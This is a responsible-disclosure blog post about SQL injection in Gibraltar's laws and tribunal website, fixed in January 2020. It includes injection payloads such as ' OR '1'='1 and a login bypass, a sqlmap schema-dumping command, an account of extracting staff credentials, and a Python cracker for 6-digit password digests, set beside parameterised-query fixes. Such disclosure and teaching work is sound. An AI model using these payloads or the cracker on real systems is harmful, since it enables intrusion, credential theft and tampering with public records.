“Rewriting the laws” of British Overseas Territory Gibraltar with SQL Injection

Special thanks to Gareth Corfield of The Register for coordinating the responsible disclosure.

Note: As of publishing this article, the vulnerable sections of the website have been shut down, effectively resolving the vulnerability.

“Do UK residents need a visa to visit Gibraltar?” was what I needed an answer to, which is why I stumbled upon Gibraltar’s Borders and Coastguard Agency website. Gibraltar is a British Overseas Territory: it falls under the jurisdiction of the UK, yet has its own government and (sort of) its own laws, so it’s a bit confusing. My intention at around 11 o’clock at night was to clarify just that and get a solid good night’s sleep. Little did I realise this would turn into a long night of exploration.

The Borders and Coastguard Agency Gibraltar site had an outlink to the Gibraltar Immigration Act, which looked like:

http://www.gibraltarlaws.gov.gi/edit_article_o.php?group_id=000000062

(Image: Law and Policies page of the Borders and Coastguard Agency, Gibraltar)

To an everyday internet user, this doesn’t mean much, but when the front page of the HM Government of Gibraltar Laws and Legislation website looks as follows, a techie would get suspicious. Notice the “Secure Site” logo at the bottom, as this is going to get interesting!

SQL Injection and database dumping

The outlink mentioned above, when clicked, displayed PDFs of laws and amendments under the Gibraltar Immigration Act, as predictable. However, the dated website seemed like something that could be vulnerable to SQL Injection. Adding just a simple character, a single quote ' (which when URL-encoded becomes %27), at the end of the URL indeed confirmed my suspicion. The website was vulnerable to the easiest kind of SQL Injection to spot: error-based.

http://www.gibraltarlaws.gov.gi/edit_article_o.php?group_id=000000062%27

(Image: output of the link with a single quote added)

Unlike the previous few pages, which showed links to PDFs of laws and amendments, nothing appeared other than the page header for the link with a ' at the end, or so it seemed at first glance. This could just have been an error due to a “bad URL,” i.e. a 404 Not Found page. Upon selecting and highlighting the entire page, however, the black-on-black text suddenly became visible:

Error in query: SELECT * FROM `article` WHERE group_id='000000062'' AND category='c'. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'c'' at line 1

That’s a proper MySQL error message spelling out the name of the table, i.e. `article`, along with the fields that follow, giving an attacker the perfect opportunity to craft malicious input accordingly.

For those not familiar, in layman’s terms, SQL Injection attacks involve an attacker providing user input, such as a username or password, which tricks the database engine processing that value into treating the input as a command to the database, as opposed to a mere data value. So, for example, the username michael would normally be processed by a database engine as a value. A crafted input provided in place of the username, like michael'--, may instead cause a vulnerable system to let an attacker access the user’s (Michael’s) account without requiring a password: the quote closes the username string, and the rest of the statement, including the password check, is turned into a comment.

At this point, it was clear the website suffered from error-based SQL Injection, not at one, but at many places.
Also, changing the group_id parameter to 0 or an invalid value dumped all PDFs.

Another place where this interesting flaw could be noticed was the Employment Tribunal Judgements section which, according to the page, “contains judgments, rulings and decisions passed by the Employment Tribunal in Gibraltar dating back to 1999.” Searching for just a single quote (') on the webpage, or a name with one, such as Derick O’Brian, will lead to a rather verbose SQL error message:

Error in query: SELECT * FROM industrial_tribunal_judgement WHERE itj_title LIKE '%'%' OR itj_case_number LIKE '%'%' OR itj_keywords LIKE '%\'%' AND itj_keywords LIKE '%%' AND itj_keywords LIKE '%%' AND itj_keywords LIKE '%%' AND itj_keywords LIKE '%%' AND (itj_tribunal = 'dummy' OR itj_tribunal = 't' OR itj_tribunal = 'a') AND (itj_type = 'dummy' OR itj_type = 'j' OR itj_type = 'd' OR itj_type = 'r') ORDER BY itj_date_passed DESC. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' OR itj_case_number LIKE '%'%' OR itj_keywords LIKE '%\'%' AND itj_keywords LI' at line 1

Note that the message itself shows the escaping was inconsistent: the quote reached the itj_keywords clause escaped as \', but the same search term was concatenated raw into the itj_title and itj_case_number clauses, which is where the statement breaks.

Using a simple penetration testing and analysis tool like sqlmap, it isn’t too hard to peek further into everything the database of a vulnerable server contains. A simple test with a command like ./sqlmap.py -u <URL> --schema is enough to list all the databases and tables contained within a MySQL instance.

Out of these, everything else seemed to be either baseline information_schema tables, which contain routine information, or the Gibraltar Laws website’s custom tables with public-facing information about laws, amendments, etc. The most interesting table out of all was user. The table, when analysed further with sqlmap (its -T option selects a table), revealed: staff member names, usernames, password digests (hashes), the IP addresses used at the time of account registration, and other information.
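Both injection points above, the quoted group_id in edit_article_o.php and the quoted search term in the tribunal search, are the same bug: the request value is spliced into the SQL string. The following is an added example, not code from the original post or from the Gibraltar site, that reproduces the pattern against an in-memory SQLite database and places the parameterised version beside each vulnerable query. The table and column names are taken from the error messages quoted above; the sample rows, the columns of the user table and the login query are constructed assumptions, and SQLite reports the broken statement with its own error text rather than MySQL’s.

```python
"""Added example (not from the original post): vulnerable vs. parameterised
queries for the three injection points discussed, on an in-memory SQLite DB.
Table/column names follow the leaked MySQL errors; rows and the user table
layout are constructed sample data."""
import sqlite3


def build_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE article (group_id TEXT, category TEXT, title TEXT);
        INSERT INTO article VALUES
            ('000000062', 'c', 'Immigration Act'),
            ('000000063', 'c', 'Another Act');
        CREATE TABLE industrial_tribunal_judgement (
            itj_title TEXT, itj_case_number TEXT);
        INSERT INTO industrial_tribunal_judgement VALUES
            ('Smith v Example Ltd', 'ET/2019/01'),
            ('O''Brian v Example Ltd', 'ET/2019/02');
        -- hypothetical CMS users table; only the table name 'user' is from the post
        CREATE TABLE user (username TEXT, password TEXT);
        INSERT INTO user VALUES ('michael', 'correct-horse-battery');
        """
    )
    return con


def articles_vulnerable(con, group_id):
    # String concatenation, as the leaked query shows: a quote in the input
    # becomes part of the SQL and a stray quote breaks the statement.
    sql = f"SELECT * FROM article WHERE group_id='{group_id}' AND category='c'"
    return con.execute(sql).fetchall()


def articles_safe(con, group_id):
    # Parameterised: the driver passes the value separately, never as SQL text.
    sql = "SELECT * FROM article WHERE group_id=? AND category='c'"
    return con.execute(sql, (group_id,)).fetchall()


def search_vulnerable(con, term):
    # Same shape as the tribunal search: the term lands inside LIKE '%...%'.
    sql = ("SELECT itj_title FROM industrial_tribunal_judgement "
           f"WHERE itj_title LIKE '%{term}%' OR itj_case_number LIKE '%{term}%'")
    return con.execute(sql).fetchall()


def search_safe(con, term):
    # The wildcards are added in Python; the whole pattern is a bound value.
    sql = ("SELECT itj_title FROM industrial_tribunal_judgement "
           "WHERE itj_title LIKE ? OR itj_case_number LIKE ?")
    pattern = f"%{term}%"
    return con.execute(sql, (pattern, pattern)).fetchall()


def login_vulnerable(con, username, password):
    # michael'-- closes the string and comments out the password check.
    sql = (f"SELECT username FROM user WHERE username='{username}' "
           f"AND password='{password}'")
    return con.execute(sql).fetchone() is not None


def login_safe(con, username, password):
    sql = "SELECT username FROM user WHERE username=? AND password=?"
    return con.execute(sql, (username, password)).fetchone() is not None


def probe(fn, con, *args):
    """Error-based probe: 'error' if the input broke the statement, else 'ok'.

    On the real site the signal was the black-on-black 'Error in query' text;
    here it is the driver raising OperationalError."""
    try:
        fn(con, *args)
        return "ok"
    except sqlite3.OperationalError:
        return "error"


if __name__ == "__main__":
    db = build_db()
    print(probe(articles_vulnerable, db, "000000062'"))   # error
    print(probe(articles_safe, db, "000000062'"))         # ok
    print(len(articles_vulnerable(db, "' OR '1'='1")))    # 2: every article
    print(login_vulnerable(db, "michael'--", "wrong"))    # True
    print(login_safe(db, "michael'--", "wrong"))          # False
```

Two practical notes. First, in search_safe the characters % and _ inside the term are still LIKE wildcards; that is a matching quirk rather than an injection, but it needs escaping if exact matching matters. Second, the fix on a PHP/MySQL site is the same idea, prepared statements through PDO or mysqli, rather than escaping by hand: the half-escaped tribunal query above is what hand escaping tends to look like once one parameter is missed.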
This is information about staff members who likely manage the content on the website, with enough privileges to edit or delete any articles, laws, amendments, and attached documents on the website, including pieces of legislation dating all the way back from 1887 to present day, 2020.

Password analysis and cracking

sqlmap and other tools have inbuilt options to further analyse a table and offer quick dictionary-based ‘guessing’ of certain password digests in it, offline. A quick analysis of the digests revealed one of the passwords was extremely weak: a mere 6-digit date combination (perhaps a date of birth or anniversary). Although the password was stored in the table as a digest rather than the actual plaintext password, the password got easily revealed in less than a second. After all, there are only a million possible 6-digit strings, and even a regular computer can very well throw over 100,000 guesses per second, so cracking a 6-digit password would be a piece of cake.

Once an attacker can get their hands on the username and password, they can modify or delete anything using the website’s CMS, including the very laws. The not-so-subtle Modify|Delete links on every page make this possible:

Sample login screen presented prior to modifying or deleting content:

Bam! A successful login enables an attacker to “rewrite any law”, delete or upload new PDFs and tamper with other data.

Yup, not going to try deletion but I’m sure it works:

Although, suffice to say, while the second step of this exploit, password analysis and cracking, looks impressive, the critical nature of the SQL Injection vulnerability itself means it isn’t necessary. With crafted queries alone an attacker could modify, delete or tamper with any of the tables and database information. With more sophisticated SQL Injection payloads, one could even potentially achieve reverse-shell access.
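As an added example (this is not the author’s sqlmap session, and the post does not say which digest the site stored), here is the offline guess written out in plain Python: a 6-digit date behind an unsalted hash falls to a date-shaped wordlist in a fraction of a second, and the entire 6-digit space is only a million hashes. The digest algorithm (MD5) and the sample password are assumptions for the demonstration.

```python
"""Added example (not from the original post): offline brute force of a
6-digit 'date' password from its digest. Algorithm and sample password are
assumptions; the post does not name the hash the site used."""
import hashlib
import time


def digest_of(plaintext: str, algorithm: str = "md5") -> str:
    """Unsalted hex digest, standing in for whatever the CMS stored."""
    return hashlib.new(algorithm, plaintext.encode()).hexdigest()


def date_candidates():
    """Date-shaped 6-digit strings: DDMMYY and MMDDYY for every day/month/year.

    Deliberately includes impossible dates such as 31/02; they cost nothing
    and an attacker would not bother filtering them out."""
    for day in range(1, 32):
        for month in range(1, 13):
            for year in range(100):
                yield f"{day:02d}{month:02d}{year:02d}"
                yield f"{month:02d}{day:02d}{year:02d}"


def all_six_digit():
    """Fallback: the whole 000000-999999 space, a million guesses."""
    for n in range(1_000_000):
        yield f"{n:06d}"


def crack(digest_hex: str, algorithm: str = "md5"):
    """Try date-shaped guesses first, then every 6-digit string.

    Returns (plaintext_or_None, guesses_made, seconds_elapsed)."""
    target = bytes.fromhex(digest_hex)
    hasher = getattr(hashlib, algorithm)
    guesses = 0
    start = time.perf_counter()
    for source in (date_candidates, all_six_digit):
        for candidate in source():
            guesses += 1
            if hasher(candidate.encode()).digest() == target:
                return candidate, guesses, time.perf_counter() - start
    return None, guesses, time.perf_counter() - start


if __name__ == "__main__":
    # Constructed sample: a staff password that is just a date, 25 Aug 1984.
    pw, guesses, secs = crack(digest_of("250884"))
    print(f"recovered {pw!r} after {guesses} guesses in {secs:.3f}s "
          f"({guesses / max(secs, 1e-9):,.0f} guesses/s)")
```

Running it, the date-shaped list finds the password in tens of milliseconds, and even a non-date 6-digit string such as 999999 falls after the full million guesses in a second or two of interpreted Python; a native cracker is far faster still. A slow, salted KDF such as bcrypt or Argon2 raises the cost per guess by orders of magnitude, but a million-entry keyspace stays enumerable, so the real fix is password length and a CMS that rejects such values, not a better hash alone.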
So next time you choose to put a “Secure Site” logo at the bottom, make sure you’re covered against the most common critical vulnerabilities. ;)

Props to the staff of HM Government of Gibraltar. Not only was the flaw resolved within a week of reporting, following the long holiday break, but the same day a fresh website was launched, replacing the previous one. Doesn’t it look pretty?

(Image: Gibraltar Laws website launched Jan 6, 2020)

© 2020 Akshay ‘Ax’ Sharma (Twitter). All Rights Reserved.